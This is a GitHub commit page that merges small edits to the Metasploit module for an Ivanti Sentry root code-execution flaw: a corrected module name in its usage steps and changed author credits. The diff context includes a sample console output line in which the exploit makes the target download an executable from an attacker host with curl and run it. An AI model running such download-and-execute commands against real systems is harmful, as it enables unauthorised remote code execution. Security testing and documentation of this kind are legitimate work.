Skip to content

Commit

Permalink
Merge branch 'ivanti-sentry-misc-log-service' of github.com:jheysel-r…
Browse files Browse the repository at this point in the history
…7/metasploit-framework into ivanti-sentry-misc-log-service
  • Loading branch information
jheysel-r7 committed Sep 7, 2023
2 parents fd6a2fa + 7944df2 commit 15908b9
Show file tree
Hide file tree
Showing 2 changed files with 4 additions and 4 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -10,7 +10,7 @@ of the `root` user.

## Verification Steps
1. Start `msfconsole`
1. Do: `use exploit/linux/http/ivanti_sentry_misc_service`
1. Do: `use exploit/linux/http/ivanti_sentry_misc_log_service`
1. Do: `set RHOST [IP]`
1. Do: `set FETCH_SRVHOST [IP]`
1. Do: `set LHOST [IP]`
Expand Down Expand Up @@ -122,7 +122,7 @@ Exploit target:
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > rexploit
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > exploit
[*] Reloading module...
[*] Command to run on remote host: curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg; chmod +x /tmp/ccrjHXsc; /tmp/ccrjHXsc &
Expand Down
4 changes: 2 additions & 2 deletions modules/exploits/linux/http/ivanti_sentry_misc_log_service.rb
Original file line number Diff line number Diff line change
Expand Up @@ -20,8 +20,8 @@ def initialize(info = {})
allows for code execution in the context of the root user.
},
'Author' => [
'Zach Hanley', # Discovery & PoC
'James Horseman', # Discovery & PoC
'Zach Hanley', # Analysis & PoC
'James Horseman', # Analysis & PoC
'jheysel-r7' # Msf module
],
'References' => [
Expand Down

0 comments on commit 15908b9

Please sign in to comment.